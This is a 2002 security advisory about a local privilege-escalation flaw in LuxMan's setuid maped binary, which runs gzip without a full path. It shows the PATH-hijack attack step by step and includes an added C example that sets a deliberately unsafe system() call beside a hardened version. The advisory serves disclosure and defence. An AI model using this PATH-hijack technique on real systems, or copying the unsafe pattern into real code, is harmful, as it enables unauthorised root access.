iDEFENSE Security Advisory 11.06.02: Non-Explicit Path Vulnerability in LuxMan

From: David Endler (dendlerat_private)
Date: Wed Nov 06 2002 - 08:56:34 PST


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    iDEFENSE Security Advisory 11.06.02:
    http://www.idefense.com/advisory/11.06.02.txt
    Non-Explicit Path Vulnerability in LuxMan
    November 6, 2002
    
    I. BACKGROUND
    
    Frank McIngvale's LuxMan is a Linux-based game similar to Pac Man.
    More information about it is available at 
    http://packages.debian.org/stable/games/luxman.html.
    
    II. DESCRIPTION
    
    Maped is a setuid binary that belongs to LuxMan. It executes gzip
    without using the full path. A local attacker can create an
    exploit binary named gzip and have maped execute it by suitably
    modifying the PATH environment variable. The following is a
    sample run and explanation of an exploit that will duplicate /dev/mem
    to /tmp/mem:
    
    First, the attacker sets the current working directory into the path
    environment variable:
    
    farmer@debian30:~$ export | grep PATH
    declare -x PATH="/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
    farmer@debian30:~$ declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
    farmer@debian30:~$ export | grep PATH
    declare -x PATH="./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games"
    
    Second, the attacker compiles the exploit as a binary named gzip and
    creates a fake archive:
    
    farmer@debian30:~$ cc gzip.c -o gzip
    farmer@debian30:~$ touch test.gz 
    
    Third, the attacker executes the maped binary:
    
    farmer@debian30:~$ `which maped` test.gz
    You must be the owner of the current console to use svgalib.
    Not running in a graphics capable console,
    and unable to find one.
    Using VGA driver.
    svgalib 1.4.3
    ...
    
    At this point, /dev/mem is being duplicated into /tmp/mem. The
    descriptor to /dev/mem can be analyzed in a separate terminal:
    
    farmer@debian30:~$ lsof | grep /dev/mem
    gzip 5197 farmer 5u CHR 1,1 178294 /dev/mem
    
    farmer@debian30:~$ cd /proc/5197/fd/
    farmer@debian30:~$ ls -l
    total 0
    lrwx------ 1 farmer farmer 64 Oct 10 05:56 0 -> /dev/pts/1
    l-wx------ 1 farmer farmer 64 Oct 10 05:56 1 -> pipe:[4991]
    lrwx------ 1 farmer farmer 64 Oct 10 05:56 2 -> /dev/pts/1
    lrwx------ 1 farmer farmer 64 Oct 10 05:56 3 -> /tmp/mem
    lr-x------ 1 farmer farmer 64 Oct 10 05:56 4 -> /dev/zero
    lrwx------ 1 farmer farmer 64 Oct 10 05:56 5 -> /dev/mem
    
    It is clear that descriptor 5 is a read/write descriptor to /dev/mem.
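
    The root cause above is a privileged program resolving a helper
    through the caller's PATH. The following C example, added here and
    not taken from LuxMan or the maped source, places the weak pattern
    next to a hardened one: a PATH check a defender can apply to an
    inherited environment, and a spawn routine that drops the setuid
    privilege, executes the helper by absolute path with a fixed
    environment, and never consults PATH or a shell. The function names,
    the fixed "PATH=/usr/bin:/bin" and the location /bin/gzip are
    assumptions for illustration.

```c
/* Added example, not maped's code: unsafe vs. hardened invocation of a
 * helper program from a setuid binary. Names and paths are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* The weak pattern: system() hands the bare name "gzip" to /bin/sh, which
 * resolves it through the caller-controlled PATH, so a "./" entry makes a
 * file named ./gzip in the caller's directory win. The string is also
 * shell-interpreted, so an archive name can carry extra commands. */
int spawn_helper_unsafe(const char *archive)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "gzip -dc %s", archive);
    return system(cmd);
}

/* Return 1 if every PATH entry is absolute and none is empty.
 * An empty entry ("::", leading or trailing ':') and any relative entry
 * such as "." or "./" resolve against the caller's working directory. */
int path_is_trusted(const char *path)
{
    if (path == NULL) return 0;
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len == 0 || p[0] != '/') return 0;
        if (sep == NULL) return 1;
        p = sep + 1;
    }
}

/* Hardened pattern: refuse anything but an absolute path, give up the
 * elevated IDs in the child, then execve() with a fixed minimal
 * environment so neither the inherited PATH nor a shell is involved.
 * Returns the child's exit status, 127 if exec failed, -1 on error. */
int run_trusted(const char *abs_path, char *const argv[])
{
    static char *const trusted_env[] = { "PATH=/usr/bin:/bin", NULL };  /* assumed */
    if (abs_path == NULL || abs_path[0] != '/') return -1;  /* never a bare name */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Drop the setuid/setgid privilege before running anything external. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        execve(abs_path, argv, trusted_env);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* What a fixed maped-style program would call instead of system("gzip ..."). */
int spawn_helper_hardened(const char *archive)
{
    char *const argv[] = { "gzip", "-dc", (char *)archive, NULL };
    return run_trusted("/bin/gzip", argv);  /* assumed location of gzip */
}

int main(void)
{
    /* The two PATH values from the advisory's sample run. */
    const char *clean = "/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games";
    const char *hijacked = "./:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games";
    printf("clean PATH trusted:    %d\n", path_is_trusted(clean));     /* 1 */
    printf("hijacked PATH trusted: %d\n", path_is_trusted(hijacked));  /* 0 */
    printf("current PATH trusted:  %d\n", path_is_trusted(getenv("PATH")));

    /* Run a trusted helper by absolute path; bare names are refused. */
    char *const argv[] = { "sh", "-c", "exit 3", NULL };
    printf("/bin/sh exit status: %d\n", run_trusted("/bin/sh", argv));  /* 3 */
    printf("bare name accepted:  %d\n", run_trusted("sh", argv));       /* -1 */
    return 0;
}
```

    The privilege drop matters as much as the absolute path: even with a
    fixed PATH, a helper started with the setuid identity inherits that
    identity, so the child should run as the invoking user unless the
    helper genuinely needs the privilege.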
    
    III. ANALYSIS
    
    Any local user can launch this attack to gain read/write access to
    /dev/mem. Such access can lead to local root compromise. 
    Exploitation is possible by scanning the file for fragments of the
    master password file and modifying kernel memory to re-map 
    system calls.
    
    IV. DETECTION
    
    LuxMan 0.41, which is packaged and distributed with Debian Linux
    3.0r0, is vulnerable. It is probable that the same LuxMan 
    version is vulnerable on other platforms as well.
    
    V. WORKAROUND
    
    Customers should consider one of the following two options:
    
    Option 1: Remove the LuxMan package by issuing the command "# apt-get
    remove luxman".
    
    Option 2: Remove the setuid bit from the maped binary by executing
    the command "# chmod -s `which maped`".
    
    VI. VENDOR RESPONSE
    
    The Debian Project has made available an updated LuxMan package that
    fixes this vulnerability. More information should be 
    available in DSA-189 at http://www.debian.org/security/2002/dsa-189 .
     
    VII. CVE INFORMATION
    
    The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
    assigned the identification number CAN-2002-1245 to this 
    issue.
    
    VIII. DISCLOSURE TIMELINE
    
    10/03/2002	Issue disclosed to iDEFENSE
    10/31/2002	Maintainer, Janos Lenart (ocsiat_private), and 
    		securityat_private notified
    10/31/2002	iDEFENSE clients notified
    11/02/2002	Responses received from ocsiat_private and Martin Schulze
    		(joeyat_private)
    11/06/2002	Public disclosure
    
    IX. CREDIT
    
    Texonet (http://www.texonet.com) discovered this vulnerability.
    
    
    
    Get paid for security research
    http://www.idefense.com/contributor.html
    
    Subscribe to iDEFENSE Advisories:
    send email to listservat_private, subject line: "subscribe"
    
    
    About iDEFENSE:
    
    iDEFENSE is a global security intelligence company that proactively
    monitors sources throughout the world — from technical
    vulnerabilities and hacker profiling to the global spread of viruses
    and other malicious code. Our security intelligence services provide 
    decision-makers, frontline security professionals and network 
    administrators with timely access to actionable intelligence
    and decision support on cyber-related threats. For more information,
    visit http://www.idefense.com.
    
    
    - -dave
    
    David Endler, CISSP
    Director, Technical Intelligence
    iDEFENSE, Inc.
    14151 Newbrook Drive
    Suite 100
    Chantilly, VA 20151
    voice: 703-344-2632
    fax: 703-961-1071
    
    dendlerat_private
    www.idefense.com
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.1.2
    Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A
    
    iQA/AwUBPclF1UrdNYRLCswqEQLR5ACgyXFDjuXKXSkUb7pa4GGMEk+3GGsAn0Hf
    feitp98Q3xxQr1bg1oMwIUBs
    =WLLe
    -----END PGP SIGNATURE-----
    
